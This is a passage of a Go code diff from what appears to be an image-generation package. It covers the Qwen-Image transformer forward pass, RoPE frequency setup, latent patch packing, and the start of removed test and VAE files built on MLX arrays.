ImgModBias: imgModBias,
TxtModWeight: mlx.Transpose(txtModWeight, 1, 0),
TxtModBias: txtModBias,
HiddenDim: cfg.HiddenDim,
NormEps: cfg.NormEps,
}, nil
}
// Forward applies the transformer block
func (tb *TransformerBlock) Forward(img, txt, temb *mlx.Array, imgFreqs, txtFreqs *mlx.Array) (*mlx.Array, *mlx.Array) {
// Compute modulation: silu(temb) -> linear -> [B, 6*D]
siluT := mlx.SiLU(temb)
imgMod := mlx.Add(mlx.Linear(siluT, tb.ImgModWeight), tb.ImgModBias)
txtMod := mlx.Add(mlx.Linear(siluT, tb.TxtModWeight), tb.TxtModBias)
// Split into 6 parts: shift1, scale1, gate1, shift2, scale2, gate2
imgModParts := splitMod6(imgMod, tb.HiddenDim)
txtModParts := splitMod6(txtMod, tb.HiddenDim)
// Pre-attention: norm + modulate
imgNorm := layerNormNoAffine(img, tb.NormEps)
imgNorm = mlx.Add(mlx.Mul(imgNorm, mlx.AddScalar(imgModParts[1], 1.0)), imgModParts[0])
txtNorm := layerNormNoAffine(txt, tb.NormEps)
txtNorm = mlx.Add(mlx.Mul(txtNorm, mlx.AddScalar(txtModParts[1], 1.0)), txtModParts[0])
// Joint attention
attnImg, attnTxt := tb.Attention.Forward(imgNorm, txtNorm, imgFreqs, txtFreqs)
// Residual with gate
img = mlx.Add(img, mlx.Mul(imgModParts[2], attnImg))
txt = mlx.Add(txt, mlx.Mul(txtModParts[2], attnTxt))
// Pre-MLP: norm + modulate
imgNorm2 := layerNormNoAffine(img, tb.NormEps)
imgNorm2 = mlx.Add(mlx.Mul(imgNorm2, mlx.AddScalar(imgModParts[4], 1.0)), imgModParts[3])
txtNorm2 := layerNormNoAffine(txt, tb.NormEps)
txtNorm2 = mlx.Add(mlx.Mul(txtNorm2, mlx.AddScalar(txtModParts[4], 1.0)), txtModParts[3])
// MLP
mlpImg := tb.ImgMLP.Forward(imgNorm2)
mlpTxt := tb.TxtMLP.Forward(txtNorm2)
// Residual with gate
img = mlx.Add(img, mlx.Mul(imgModParts[5], mlpImg))
txt = mlx.Add(txt, mlx.Mul(txtModParts[5], mlpTxt))
return img, txt
}
// splitMod6 splits modulation into 6 parts each [B, 1, D]
func splitMod6(mod *mlx.Array, hiddenDim int32) []*mlx.Array {
shape := mod.Shape()
B := shape[0]
parts := make([]*mlx.Array, 6)
for i := int32(0); i < 6; i++ {
part := mlx.Slice(mod, []int32{0, i * hiddenDim}, []int32{B, (i + 1) * hiddenDim})
parts[i] = mlx.ExpandDims(part, 1)
}
return parts
}
// layerNormNoAffine applies layer norm without learnable parameters
func layerNormNoAffine(x *mlx.Array, eps float32) *mlx.Array {
ndim := x.Ndim()
lastAxis := ndim - 1
mean := mlx.Mean(x, lastAxis, true)
xCentered := mlx.Sub(x, mean)
variance := mlx.Mean(mlx.Square(xCentered), lastAxis, true)
return mlx.Div(xCentered, mlx.Sqrt(mlx.AddScalar(variance, eps)))
}
// Transformer is the full Qwen-Image transformer model
type Transformer struct {
Config *TransformerConfig
ImgIn *mlx.Array
ImgInBias *mlx.Array
TxtIn *mlx.Array
TxtInBias *mlx.Array
TxtNorm *mlx.Array
TEmbed *TimestepEmbedder
Layers []*TransformerBlock
NormOutWeight *mlx.Array
NormOutBias *mlx.Array
ProjOut *mlx.Array
ProjOutBias *mlx.Array
}
// Load loads the transformer from a directory
func (m *Transformer) Load(path string) error {
fmt.Println("Loading Qwen-Image transformer...")
cfg := defaultTransformerConfig()
m.Config = cfg
weights, err := safetensors.LoadModelWeights(path)
if err != nil {
return fmt.Errorf("weights: %w", err)
}
// Bulk load all weights as bf16
fmt.Print(" Loading weights as bf16... ")
if err := weights.Load(mlx.DtypeBFloat16); err != nil {
return fmt.Errorf("load weights: %w", err)
}
fmt.Printf("✓ (%.1f GB)\n", float64(mlx.MetalGetActiveMemory())/(1024*1024*1024))
fmt.Print(" Loading input projections... ")
imgIn, _ := weights.Get("img_in.weight")
imgInBias, _ := weights.Get("img_in.bias")
txtIn, _ := weights.Get("txt_in.weight")
txtInBias, _ := weights.Get("txt_in.bias")
txtNorm, _ := weights.Get("txt_norm.weight")
m.ImgIn = mlx.Transpose(imgIn, 1, 0)
m.ImgInBias = imgInBias
m.TxtIn = mlx.Transpose(txtIn, 1, 0)
m.TxtInBias = txtInBias
m.TxtNorm = txtNorm
fmt.Println("✓")
fmt.Print(" Loading timestep embedder... ")
m.TEmbed, err = newTimestepEmbedder(weights)
if err != nil {
return fmt.Errorf("timestep embedder: %w", err)
}
fmt.Println("✓")
m.Layers = make([]*TransformerBlock, cfg.NLayers)
for i := int32(0); i < cfg.NLayers; i++ {
fmt.Printf("\r Loading transformer layers... %d/%d", i+1, cfg.NLayers)
prefix := fmt.Sprintf("transformer_blocks.%d", i)
m.Layers[i], err = newTransformerBlock(weights, prefix, cfg)
if err != nil {
return fmt.Errorf("layer %d: %w", i, err)
}
}
fmt.Printf("\r Loading transformer layers... ✓ [%d blocks] \n", cfg.NLayers)
fmt.Print(" Loading output layers... ")
normOutWeight, _ := weights.Get("norm_out.linear.weight")
normOutBias, _ := weights.Get("norm_out.linear.bias")
projOut, _ := weights.Get("proj_out.weight")
projOutBias, _ := weights.Get("proj_out.bias")
m.NormOutWeight = mlx.Transpose(normOutWeight, 1, 0)
m.NormOutBias = normOutBias
m.ProjOut = mlx.Transpose(projOut, 1, 0)
m.ProjOutBias = projOutBias
fmt.Println("✓")
weights.ReleaseAll()
return nil
}
// LoadFromPath is a convenience function to load transformer from path
func LoadTransformerFromPath(path string) (*Transformer, error) {
m := &Transformer{}
if err := m.Load(filepath.Join(path, "transformer")); err != nil {
return nil, err
}
return m, nil
}
// Forward runs the transformer
// img: [B, L_img, in_channels] patchified latents
// txt: [B, L_txt, joint_attention_dim] text embeddings
// t: [B] timesteps (0-1)
// imgFreqs, txtFreqs: RoPE frequencies
func (tr *Transformer) Forward(img, txt, t *mlx.Array, imgFreqs, txtFreqs *mlx.Array) *mlx.Array {
imgShape := img.Shape()
B := imgShape[0]
Limg := imgShape[1]
txtShape := txt.Shape()
Ltxt := txtShape[1]
// Timestep embedding
temb := tr.TEmbed.Forward(t)
// Project image: [B, L, in_channels] -> [B, L, hidden_dim]
imgFlat := mlx.Reshape(img, B*Limg, tr.Config.InChannels)
imgH := mlx.Add(mlx.Linear(imgFlat, tr.ImgIn), tr.ImgInBias)
imgH = mlx.Reshape(imgH, B, Limg, tr.Config.HiddenDim)
// Project text: RMSNorm then linear
txtFlat := mlx.Reshape(txt, B*Ltxt, tr.Config.JointAttentionDim)
txtNormed := mlx.RMSNorm(txtFlat, tr.TxtNorm, 1e-6)
txtH := mlx.Add(mlx.Linear(txtNormed, tr.TxtIn), tr.TxtInBias)
txtH = mlx.Reshape(txtH, B, Ltxt, tr.Config.HiddenDim)
for _, layer := range tr.Layers {
imgH, txtH = layer.Forward(imgH, txtH, temb, imgFreqs, txtFreqs)
}
// Final norm with modulation (AdaLayerNormContinuous)
// Python: scale, shift = torch.chunk(emb, 2, dim=1)
finalMod := mlx.Add(mlx.Linear(mlx.SiLU(temb), tr.NormOutWeight), tr.NormOutBias)
modShape := finalMod.Shape()
halfDim := modShape[1] / 2
scale := mlx.ExpandDims(mlx.Slice(finalMod, []int32{0, 0}, []int32{B, halfDim}), 1)
shift := mlx.ExpandDims(mlx.Slice(finalMod, []int32{0, halfDim}, []int32{B, modShape[1]}), 1)
imgH = layerNormNoAffine(imgH, tr.Config.NormEps)
imgH = mlx.Add(mlx.Mul(imgH, mlx.AddScalar(scale, 1.0)), shift)
// Final projection: [B, L, hidden_dim] -> [B, L, patch_size^2 * out_channels]
imgFlat = mlx.Reshape(imgH, B*Limg, tr.Config.HiddenDim)
out := mlx.Add(mlx.Linear(imgFlat, tr.ProjOut), tr.ProjOutBias)
outChannels := tr.Config.PatchSize * tr.Config.PatchSize * tr.Config.OutChannels
return mlx.Reshape(out, B, Limg, outChannels)
}
// ForwardWithCache runs the transformer with layer caching for speedup.
// Based on DeepCache (CVPR 2024) / Learning-to-Cache (NeurIPS 2024):
// shallow layers change little between denoising steps, so we cache their
// outputs and reuse them on non-refresh steps.
//
// stepCache: cache for layer outputs (use cache.NewStepCache(cacheLayers))
// step: current denoising step (0-indexed)
// cacheInterval: refresh cache every N steps (e.g., 3)
// cacheLayers: number of shallow layers to cache (e.g., 15)
func (tr *Transformer) ForwardWithCache(
img, txt, t *mlx.Array,
imgFreqs, txtFreqs *mlx.Array,
stepCache *cache.StepCache,
step, cacheInterval, cacheLayers int,
) *mlx.Array {
imgShape := img.Shape()
B := imgShape[0]
Limg := imgShape[1]
txtShape := txt.Shape()
Ltxt := txtShape[1]
// Timestep embedding
temb := tr.TEmbed.Forward(t)
// Project image: [B, L, in_channels] -> [B, L, hidden_dim]
imgFlat := mlx.Reshape(img, B*Limg, tr.Config.InChannels)
imgH := mlx.Add(mlx.Linear(imgFlat, tr.ImgIn), tr.ImgInBias)
imgH = mlx.Reshape(imgH, B, Limg, tr.Config.HiddenDim)
// Project text: RMSNorm then linear
txtFlat := mlx.Reshape(txt, B*Ltxt, tr.Config.JointAttentionDim)
txtNormed := mlx.RMSNorm(txtFlat, tr.TxtNorm, 1e-6)
txtH := mlx.Add(mlx.Linear(txtNormed, tr.TxtIn), tr.TxtInBias)
txtH = mlx.Reshape(txtH, B, Ltxt, tr.Config.HiddenDim)
// Check if we should refresh the cache
refreshCache := stepCache.ShouldRefresh(step, cacheInterval)
for i, layer := range tr.Layers {
if i < cacheLayers && !refreshCache && stepCache.Get(i) != nil {
// Use cached outputs for shallow layers
imgH = stepCache.Get(i)
txtH = stepCache.Get2(i)
} else {
// Compute layer
imgH, txtH = layer.Forward(imgH, txtH, temb, imgFreqs, txtFreqs)
// Cache shallow layers on refresh steps
if i < cacheLayers && refreshCache {
stepCache.Set(i, imgH)
stepCache.Set2(i, txtH)
}
}
}
// Final norm with modulation (AdaLayerNormContinuous)
finalMod := mlx.Add(mlx.Linear(mlx.SiLU(temb), tr.NormOutWeight), tr.NormOutBias)
modShape := finalMod.Shape()
halfDim := modShape[1] / 2
scale := mlx.ExpandDims(mlx.Slice(finalMod, []int32{0, 0}, []int32{B, halfDim}), 1)
shift := mlx.ExpandDims(mlx.Slice(finalMod, []int32{0, halfDim}, []int32{B, modShape[1]}), 1)
imgH = layerNormNoAffine(imgH, tr.Config.NormEps)
imgH = mlx.Add(mlx.Mul(imgH, mlx.AddScalar(scale, 1.0)), shift)
// Final projection: [B, L, hidden_dim] -> [B, L, patch_size^2 * out_channels]
imgFlat = mlx.Reshape(imgH, B*Limg, tr.Config.HiddenDim)
out := mlx.Add(mlx.Linear(imgFlat, tr.ProjOut), tr.ProjOutBias)
outChannels := tr.Config.PatchSize * tr.Config.PatchSize * tr.Config.OutChannels
return mlx.Reshape(out, B, Limg, outChannels)
}
// RoPECache holds precomputed RoPE frequencies
type RoPECache struct {
ImgFreqs *mlx.Array // [L_img, head_dim]
TxtFreqs *mlx.Array // [L_txt, head_dim]
}
// PrepareRoPE computes RoPE for image and text sequences
// This matches Python's QwenEmbedRope with scale_rope=True
func PrepareRoPE(imgH, imgW int32, txtLen int32, axesDims []int32) *RoPECache {
theta := float64(10000)
maxIdx := int32(4096)
// Compute base frequencies for each axis dimension
freqsT := ComputeAxisFreqs(axesDims[0], theta)
freqsH := ComputeAxisFreqs(axesDims[1], theta)
freqsW := ComputeAxisFreqs(axesDims[2], theta)
// Build frequency lookup tables
posFreqsT := MakeFreqTable(maxIdx, freqsT, false)
posFreqsH := MakeFreqTable(maxIdx, freqsH, false)
posFreqsW := MakeFreqTable(maxIdx, freqsW, false)
negFreqsH := MakeFreqTable(maxIdx, freqsH, true)
negFreqsW := MakeFreqTable(maxIdx, freqsW, true)
// Image frequencies with scale_rope=True
imgLen := imgH * imgW
headDim := int32(len(freqsT)+len(freqsH)+len(freqsW)) * 2
imgFreqsData := make([]float32, imgLen*headDim)
hHalf := imgH / 2
wHalf := imgW / 2
idx := int32(0)
for y := int32(0); y < imgH; y++ {
for x := int32(0); x < imgW; x++ {
// Frame = 0
for i := 0; i < len(freqsT)*2; i++ {
imgFreqsData[idx+int32(i)] = posFreqsT[0][i]
}
idx += int32(len(freqsT) * 2)
// Height: scale_rope pattern
hNegCount := imgH - hHalf
if y < hNegCount {
negTableIdx := maxIdx - hNegCount + y
for i := 0; i < len(freqsH)*2; i++ {
imgFreqsData[idx+int32(i)] = negFreqsH[negTableIdx][i]
}
} else {
posIdx := y - hNegCount
for i := 0; i < len(freqsH)*2; i++ {
imgFreqsData[idx+int32(i)] = posFreqsH[posIdx][i]
}
}
idx += int32(len(freqsH) * 2)
// Width: scale_rope pattern
wNegCount := imgW - wHalf
if x < wNegCount {
negTableIdx := maxIdx - wNegCount + x
for i := 0; i < len(freqsW)*2; i++ {
imgFreqsData[idx+int32(i)] = negFreqsW[negTableIdx][i]
}
} else {
posIdx := x - wNegCount
for i := 0; i < len(freqsW)*2; i++ {
imgFreqsData[idx+int32(i)] = posFreqsW[posIdx][i]
}
}
idx += int32(len(freqsW) * 2)
}
}
imgFreqs := mlx.NewArray(imgFreqsData, []int32{imgLen, headDim})
imgFreqs = mlx.ToBFloat16(imgFreqs)
// Text frequencies
maxVidIdx := max(hHalf, wHalf)
txtFreqsData := make([]float32, txtLen*headDim)
idx = 0
for t := int32(0); t < txtLen; t++ {
pos := maxVidIdx + t
for i := 0; i < len(freqsT)*2; i++ {
txtFreqsData[idx+int32(i)] = posFreqsT[pos][i]
}
idx += int32(len(freqsT) * 2)
for i := 0; i < len(freqsH)*2; i++ {
txtFreqsData[idx+int32(i)] = posFreqsH[pos][i]
}
idx += int32(len(freqsH) * 2)
for i := 0; i < len(freqsW)*2; i++ {
txtFreqsData[idx+int32(i)] = posFreqsW[pos][i]
}
idx += int32(len(freqsW) * 2)
}
txtFreqs := mlx.NewArray(txtFreqsData, []int32{txtLen, headDim})
txtFreqs = mlx.ToBFloat16(txtFreqs)
return &RoPECache{
ImgFreqs: imgFreqs,
TxtFreqs: txtFreqs,
}
}
// ComputeAxisFreqs computes RoPE base frequencies for a given dimension.
func ComputeAxisFreqs(dim int32, theta float64) []float64 {
halfDim := dim / 2
freqs := make([]float64, halfDim)
for i := int32(0); i < halfDim; i++ {
freqs[i] = 1.0 / math.Pow(theta, float64(i)/float64(halfDim))
}
return freqs
}
// MakeFreqTable builds a table of cos/sin values for RoPE positions.
func MakeFreqTable(maxIdx int32, baseFreqs []float64, negative bool) [][]float32 {
table := make([][]float32, maxIdx)
for idx := int32(0); idx < maxIdx; idx++ {
var pos float64
if negative {
pos = float64(-maxIdx + int32(idx))
} else {
pos = float64(idx)
}
row := make([]float32, len(baseFreqs)*2)
for i, f := range baseFreqs {
angle := pos * f
row[i*2] = float32(math.Cos(angle))
row[i*2+1] = float32(math.Sin(angle))
}
table[idx] = row
}
return table
}
func max(a, b int32) int32 {
if a > b {
return a
}
return b
}
// PackLatents converts [B, C, H, W] to [B, L, C*4] patches
func PackLatents(latents *mlx.Array, patchSize int32) *mlx.Array {
shape := latents.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
pH := H / patchSize
pW := W / patchSize
// [B, C, H, W] -> [B, C, pH, 2, pW, 2]
x := mlx.Reshape(latents, B, C, pH, patchSize, pW, patchSize)
// -> [B, pH, pW, C, 2, 2]
x = mlx.Transpose(x, 0, 2, 4, 1, 3, 5)
// -> [B, pH*pW, C*4]
return mlx.Reshape(x, B, pH*pW, C*patchSize*patchSize)
}
// UnpackLatents converts [B, L, C*4] back to [B, C, 1, H, W] (5D for VAE)
func UnpackLatents(patches *mlx.Array, H, W, patchSize int32) *mlx.Array {
shape := patches.Shape()
B := shape[0]
channels := shape[2] / (patchSize * patchSize)
pH := H / patchSize
pW := W / patchSize
// [B, L, C*4] -> [B, pH, pW, C, 2, 2]
x := mlx.Reshape(patches, B, pH, pW, channels, patchSize, patchSize)
// -> [B, C, pH, 2, pW, 2]
x = mlx.Transpose(x, 0, 3, 1, 4, 2, 5)
// -> [B, C, H, W]
x = mlx.Reshape(x, B, channels, pH*patchSize, pW*patchSize)
// Add temporal dimension for VAE: [B, C, 1, H, W]
return mlx.ExpandDims(x, 2)
}

View File

@@ -1,119 +0,0 @@
//go:build mlx
package qwen_image
import (
"math"
"os"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// TestTransformerConfig tests configuration invariants.
func TestTransformerConfig(t *testing.T) {
cfg := defaultTransformerConfig()
// Property: hidden_dim = n_heads * head_dim
if cfg.HiddenDim != cfg.NHeads*cfg.HeadDim {
t.Errorf("hidden_dim != n_heads * head_dim: %d != %d * %d",
cfg.HiddenDim, cfg.NHeads, cfg.HeadDim)
}
// Property: axes_dims_rope sums to head_dim
var ropeSum int32
for _, d := range cfg.AxesDimsRope {
ropeSum += d
}
if ropeSum != cfg.HeadDim {
t.Errorf("axes_dims_rope sum != head_dim: %d != %d", ropeSum, cfg.HeadDim)
}
// Property: in_channels = out_channels * patch_size^2
expectedIn := cfg.OutChannels * cfg.PatchSize * cfg.PatchSize
if cfg.InChannels != expectedIn {
t.Errorf("in_channels != out_channels * patch_size^2: %d != %d", cfg.InChannels, expectedIn)
}
}
// TestTransformerRoPE tests RoPE frequency computation produces valid values.
func TestTransformerRoPE(t *testing.T) {
cfg := defaultTransformerConfig()
// Test with small image dimensions
imgH, imgW := int32(4), int32(4) // 4x4 latent = 16 patches
txtLen := int32(5)
ropeCache := PrepareRoPE(imgH, imgW, txtLen, cfg.AxesDimsRope)
mlx.Eval(ropeCache.ImgFreqs, ropeCache.TxtFreqs)
// Verify shapes: [seq_len, head_dim]
imgSeqLen := imgH * imgW
if ropeCache.ImgFreqs.Shape()[0] != imgSeqLen {
t.Errorf("ImgFreqs seq_len: got %d, want %d", ropeCache.ImgFreqs.Shape()[0], imgSeqLen)
}
if ropeCache.ImgFreqs.Shape()[1] != cfg.HeadDim {
t.Errorf("ImgFreqs head_dim: got %d, want %d", ropeCache.ImgFreqs.Shape()[1], cfg.HeadDim)
}
if ropeCache.TxtFreqs.Shape()[0] != txtLen {
t.Errorf("TxtFreqs seq_len: got %d, want %d", ropeCache.TxtFreqs.Shape()[0], txtLen)
}
// Verify values are finite
imgData := ropeCache.ImgFreqs.Data()
for i := 0; i < min(100, len(imgData)); i++ {
if math.IsNaN(float64(imgData[i])) || math.IsInf(float64(imgData[i]), 0) {
t.Errorf("ImgFreqs[%d] not finite: %v", i, imgData[i])
break
}
}
}
// TestTransformerForward tests full forward pass (integration test).
// Skips if model weights are not available.
func TestTransformerForward(t *testing.T) {
weightsPath := "../../../weights/Qwen-Image-2512/transformer"
if _, err := os.Stat(weightsPath); os.IsNotExist(err) {
t.Skip("Skipping: model weights not found at " + weightsPath)
}
transformer := &Transformer{}
if err := transformer.Load(weightsPath); err != nil {
t.Fatalf("Failed to load transformer: %v", err)
}
mlx.Keep(mlx.Collect(transformer)...)
cfg := transformer.Config
// Small test inputs
batchSize := int32(1)
imgH, imgW := int32(4), int32(4)
imgSeqLen := imgH * imgW
txtSeqLen := int32(5)
hiddenStates := mlx.RandomNormal([]int32{batchSize, imgSeqLen, cfg.InChannels}, 0)
encoderHiddenStates := mlx.RandomNormal([]int32{batchSize, txtSeqLen, cfg.JointAttentionDim}, 0)
timestep := mlx.NewArray([]float32{0.5}, []int32{batchSize})
ropeCache := PrepareRoPE(imgH, imgW, txtSeqLen, cfg.AxesDimsRope)
// Forward pass
out := transformer.Forward(hiddenStates, encoderHiddenStates, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
mlx.Eval(out)
// Verify output shape: [batch, img_seq_len, in_channels]
wantShape := []int32{batchSize, imgSeqLen, cfg.InChannels}
gotShape := out.Shape()
if gotShape[0] != wantShape[0] || gotShape[1] != wantShape[1] || gotShape[2] != wantShape[2] {
t.Errorf("output shape: got %v, want %v", gotShape, wantShape)
}
// Verify output is finite
outData := out.Data()
for i := 0; i < min(100, len(outData)); i++ {
if math.IsNaN(float64(outData[i])) || math.IsInf(float64(outData[i]), 0) {
t.Errorf("output[%d] not finite: %v", i, outData[i])
break
}
}
}

View File

@@ -1,854 +0,0 @@
//go:build mlx
package qwen_image
import (
"fmt"
"math"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// VAEConfig holds Qwen-Image VAE configuration
type VAEConfig struct {
ZDim int32 `json:"z_dim"` // 16
BaseDim int32 `json:"base_dim"` // 96
DimMult []int32 `json:"dim_mult"` // [1, 2, 4, 4]
NumResBlocks int32 `json:"num_res_blocks"` // 2
LatentsMean []float32 `json:"latents_mean"` // 16 values
LatentsStd []float32 `json:"latents_std"` // 16 values
TemperalDownsample []bool `json:"temperal_downsample"` // [false, true, true]
}
// defaultVAEConfig returns config for Qwen-Image VAE
func defaultVAEConfig() *VAEConfig {
return &VAEConfig{
ZDim: 16,
BaseDim: 96,
DimMult: []int32{1, 2, 4, 4},
NumResBlocks: 2,
LatentsMean: []float32{
-0.7571, -0.7089, -0.9113, 0.1075,
-0.1745, 0.9653, -0.1517, 1.5508,
0.4134, -0.0715, 0.5517, -0.3632,
-0.1922, -0.9497, 0.2503, -0.2921,
},
LatentsStd: []float32{
2.8184, 1.4541, 2.3275, 2.6558,
1.2196, 1.7708, 2.6052, 2.0743,
3.2687, 2.1526, 2.8652, 1.5579,
1.6382, 1.1253, 2.8251, 1.916,
},
TemperalDownsample: []bool{false, true, true},
}
}
// CausalConv3d is a causal 3D convolution (for temporal causality)
type CausalConv3d struct {
Weight *mlx.Array
Bias *mlx.Array
BiasReshaped *mlx.Array // [1, C, 1, 1, 1]
KernelT int32
}
// newCausalConv3d creates a 3D causal conv
func newCausalConv3d(weights *safetensors.ModelWeights, prefix string) (*CausalConv3d, error) {
weight, err := weights.Get(prefix + ".weight")
if err != nil {
return nil, fmt.Errorf("weight not found: %s", prefix)
}
bias, _ := weights.Get(prefix + ".bias")
kernelT := weight.Shape()[2]
outC := weight.Shape()[0]
var biasReshaped *mlx.Array
if bias != nil {
biasReshaped = mlx.Reshape(bias, 1, outC, 1, 1, 1)
}
return &CausalConv3d{
Weight: weight,
Bias: bias,
BiasReshaped: biasReshaped,
KernelT: kernelT,
}, nil
}
// Forward applies causal 3D convolution
// x: [B, T, H, W, C] (channels-last, MLX format)
func (c *CausalConv3d) Forward(x *mlx.Array) *mlx.Array {
shape := c.Weight.Shape() // PyTorch format: [O, I, kT, kH, kW]
kernelT := shape[2]
kernelH := shape[3]
kernelW := shape[4]
// Causal temporal padding, same spatial padding
// Input is channels-last: [B, T, H, W, C]
padT := kernelT - 1
padH := kernelH / 2
padW := kernelW / 2
// Stage 1: Pad
{
x = pad3DChannelsLast(x, padT, 0, padH, padH, padW, padW)
mlx.Eval(x)
}
// Stage 2: Conv + bias
var out *mlx.Array
{
prev := x
weight := mlx.Transpose(c.Weight, 0, 2, 3, 4, 1)
out = mlx.Conv3d(x, weight, 1, 1, 1, 0, 0, 0)
if c.Bias != nil {
bias := mlx.Reshape(c.Bias, 1, 1, 1, 1, c.Bias.Dim(0))
out = mlx.Add(out, bias)
}
prev.Free()
mlx.Eval(out)
}
return out
}
// RMSNorm3D applies RMS normalization over channels
// Works with channels-last [B, T, H, W, C] format
type RMSNorm3D struct {
Gamma *mlx.Array // [1, 1, 1, 1, C] for broadcasting
}
// newRMSNorm3D creates an RMS norm
func newRMSNorm3D(weights *safetensors.ModelWeights, prefix string, dim int32) (*RMSNorm3D, error) {
gamma, err := weights.Get(prefix + ".gamma")
if err != nil {
return nil, err
}
// Reshape for channels-last broadcasting: [1, 1, 1, 1, C]
gamma = mlx.Reshape(gamma, 1, 1, 1, 1, gamma.Dim(0))
return &RMSNorm3D{Gamma: gamma}, nil
}
// Forward applies RMS norm to channels-last input [B, T, H, W, C]
func (n *RMSNorm3D) Forward(x *mlx.Array) *mlx.Array {
// RMSNorm: x * rsqrt(mean(x^2) + eps) * gamma
normalized := mlx.RMSNormNoWeight(x, 1e-6)
return mlx.Mul(normalized, n.Gamma)
}
// ResBlock is a residual block with RMS norm and causal convs
type ResBlock struct {
Norm1 *RMSNorm3D
Conv1 *CausalConv3d
Norm2 *RMSNorm3D
Conv2 *CausalConv3d
Shortcut *CausalConv3d
}
// newResBlock creates a residual block
func newResBlock(weights *safetensors.ModelWeights, prefix string, inDim, outDim int32) (*ResBlock, error) {
norm1, err := newRMSNorm3D(weights, prefix+".norm1", inDim)
if err != nil {
return nil, err
}
conv1, err := newCausalConv3d(weights, prefix+".conv1")
if err != nil {
return nil, err
}
norm2, err := newRMSNorm3D(weights, prefix+".norm2", outDim)
if err != nil {
return nil, err
}
conv2, err := newCausalConv3d(weights, prefix+".conv2")
if err != nil {
return nil, err
}
var shortcut *CausalConv3d
if inDim != outDim {
shortcut, err = newCausalConv3d(weights, prefix+".conv_shortcut")
if err != nil {
return nil, err
}
}
return &ResBlock{
Norm1: norm1,
Conv1: conv1,
Norm2: norm2,
Conv2: conv2,
Shortcut: shortcut,
}, nil
}
// Forward applies the residual block
func (r *ResBlock) Forward(x *mlx.Array) *mlx.Array {
// Use h as working variable, keep x intact for residual (caller will free x)
// Conv handles its own pools, so we just need pools for non-conv operations
var h *mlx.Array
// Keep x so it survives Eval() cleanup - needed for residual connection
mlx.Keep(x)
// Stage 1: norm1 + silu
{
h = r.Norm1.Forward(x)
h = silu3D(h)
mlx.Eval(h)
}
// Stage 2: conv1 (handles its own pools)
{
prev := h
h = r.Conv1.Forward(h)
prev.Free()
}
// Stage 3: norm2 + silu
{
prev := h
h = r.Norm2.Forward(h)
h = silu3D(h)
prev.Free()
mlx.Eval(h)
}
// Stage 4: conv2 (handles its own pools)
{
prev := h
h = r.Conv2.Forward(h)
prev.Free()
}
// Residual connection (shortcut handles its own pools if present)
if r.Shortcut != nil {
shortcut := r.Shortcut.Forward(x)
h = mlx.Add(h, shortcut)
mlx.Eval(h)
} else {
h = mlx.Add(h, x)
mlx.Eval(h)
}
return h
}
// AttentionBlock is a 2D attention block
type AttentionBlock struct {
Norm *RMSNorm3D
ToQKV *mlx.Array
ToQKVBias *mlx.Array
Proj *mlx.Array
ProjBias *mlx.Array
Dim int32
}
// newAttentionBlock creates an attention block
func newAttentionBlock(weights *safetensors.ModelWeights, prefix string, dim int32) (*AttentionBlock, error) {
norm, err := newRMSNorm3D(weights, prefix+".norm", dim)
if err != nil {
return nil, err
}
toQKV, _ := weights.Get(prefix + ".to_qkv.weight")
toQKVBias, _ := weights.Get(prefix + ".to_qkv.bias")
proj, _ := weights.Get(prefix + ".proj.weight")
projBias, _ := weights.Get(prefix + ".proj.bias")
return &AttentionBlock{
Norm: norm,
ToQKV: toQKV,
ToQKVBias: toQKVBias,
Proj: proj,
ProjBias: projBias,
Dim: dim,
}, nil
}
// Forward applies 2D attention
// Input: [B, T, H, W, C] (channels-last)
func (a *AttentionBlock) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
identity := x
// Flatten to [B*T, 1, H, W, C] for norm
x = mlx.Reshape(x, B*T, 1, H, W, C)
x = a.Norm.Forward(x)
x = mlx.Reshape(x, B*T, H, W, C)
// Flatten spatial to [B*T, H*W, C]
x = mlx.Reshape(x, B*T, H*W, C)
// Linear to get Q, K, V: [B*T, H*W, 3*C]
// Weight is [outC, inC] or [outC, inC, 1, 1]
wShape := a.ToQKV.Shape()
var w *mlx.Array
if len(wShape) == 4 {
w = mlx.Reshape(a.ToQKV, wShape[0], wShape[1])
} else {
w = a.ToQKV
}
w = mlx.Transpose(w, 1, 0) // [inC, outC]
qkv := mlx.Linear(x, w) // [B*T, H*W, 3*C]
if a.ToQKVBias != nil {
qkv = mlx.Add(qkv, a.ToQKVBias)
}
qkv = mlx.Reshape(qkv, B*T, 1, H*W, 3*C)
q := mlx.Slice(qkv, []int32{0, 0, 0, 0}, []int32{B * T, 1, H * W, C})
k := mlx.Slice(qkv, []int32{0, 0, 0, C}, []int32{B * T, 1, H * W, 2 * C})
v := mlx.Slice(qkv, []int32{0, 0, 0, 2 * C}, []int32{B * T, 1, H * W, 3 * C})
scale := float32(1.0 / math.Sqrt(float64(C)))
out := mlx.ScaledDotProductAttention(q, k, v, scale, false)
// out: [B*T, 1, H*W, C]
out = mlx.Reshape(out, B*T, H*W, C)
// Project back
pShape := a.Proj.Shape()
var p *mlx.Array
if len(pShape) == 4 {
p = mlx.Reshape(a.Proj, pShape[0], pShape[1])
} else {
p = a.Proj
}
p = mlx.Transpose(p, 1, 0) // [inC, outC]
out = mlx.Linear(out, p) // [B*T, H*W, C]
if a.ProjBias != nil {
out = mlx.Add(out, a.ProjBias)
}
out = mlx.Reshape(out, B, T, H, W, C)
return mlx.Add(out, identity)
}
// UpBlock handles upsampling in decoder
type UpBlock struct {
ResBlocks []*ResBlock
Upsampler *Upsample
}
// newUpBlock creates an up block
func newUpBlock(weights *safetensors.ModelWeights, prefix string, inDim, outDim int32, numBlocks int32, upsampleMode string) (*UpBlock, error) {
resBlocks := make([]*ResBlock, numBlocks+1)
currentDim := inDim
for i := int32(0); i <= numBlocks; i++ {
resPrefix := fmt.Sprintf("%s.resnets.%d", prefix, i)
block, err := newResBlock(weights, resPrefix, currentDim, outDim)
if err != nil {
return nil, err
}
resBlocks[i] = block
currentDim = outDim
}
var upsampler *Upsample
if upsampleMode != "" {
upsampler = newUpsample(weights, prefix+".upsamplers.0", outDim, upsampleMode)
}
return &UpBlock{
ResBlocks: resBlocks,
Upsampler: upsampler,
}, nil
}
// Forward applies up block with staged memory management
func (u *UpBlock) Forward(x *mlx.Array) *mlx.Array {
